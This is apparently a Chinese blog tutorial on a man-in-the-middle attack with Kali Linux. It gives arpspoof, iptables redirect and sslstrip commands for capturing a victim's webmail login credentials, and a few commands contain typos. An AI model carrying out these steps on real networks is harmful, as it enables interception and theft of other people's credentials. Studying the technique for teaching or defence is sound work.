kali linux 中间人攻击

中间人攻击(Man-in-the-Middle Attack, MITM),是指攻击者跟受害者分别建立独立连接的一种入侵式攻击。最常出现于主机系统之间。

它入侵了将用户从非安全的网页连接到安全的网页系统。这样攻击者可以窃取那些连接到安全Web服务器的用户数据。

SSL strip 工具

SSL会话劫持,一种中间人攻击的形式。网络攻击者代理的是来自用户的HTTPS请求,并不是可以被拦截和篡改的通过HTTP发送的形式。SSL strip 可以将这种攻击自动化,允许第三方拦截到安全的站点的数据连接。时至今日,SSL会话劫持任然是广为使用。

初步使用只需要用到一个网卡接口。可以通过以下的命令来查看有几个网卡。

ifconfig|grep "eth"

如果启动了不止一个网卡,则关掉一个。示例关掉eth0

ifdown eth0

现在我们需要两部分的信息。目标的IP地址和自己的默认网关。

route -n|grep 'UG'|awk '{print $2}'

1.开始攻击:重定向

在开始从SSL会话中收集注入用户凭据一类的信息之前,需要先运行我们重定向网络请求工具。此外,需要重定向攻击主机中抓取请求,这样才能将用户数据包发给SSL strip。

先要在Iptables和Arpspoof工具中启用IP转发的功能。

echo 1 >/proc/sys/net/ipv4/ip_forward

为了避免让所有攻击主机对整个网络发起ARP地址洪水引起注意。在实际攻击场所中,理想情况下都是针对整个二段网络运行arpspoof,同时可以选择利用抓包和嗅探工具来进一步判定受害者的IP地址。命令是:

arpspoof -i eth0 -t victimip default_gateway_ip
举例:arppoof -i eth0 -t 10.0.1.240 10.0.1.1

不建议把该进程挂在后台运行。

2.使用iptables建立端口重定义

这一步的主要意义是攻击者抓取TCP80端口的数据,将其重定向到SSL strip的监听端口。

举例:把  80—>10000

iptables -t nat -A PREROUTING -p tcp --destination 80 -j REDIRECT --to 10000

如果想禁用 PREROUTNIG规则,可以将 -A替换成-D清楚规则。

清空:  iptables -nat -F
检查:  iptables -nat -L

准备就绪,就可以使用SSL strip 抓取数据了。

在新打开的终端窗口启动sslstrip,运行。

sslstrip  -l 10000

在目标主机上访问在线邮件服务,并登录。

另外再打开一个终端窗口,输入

tail -n 50 -f sslstrip.log

这样就可以看到SSL strip攻击的结果了。

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chen_kng

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值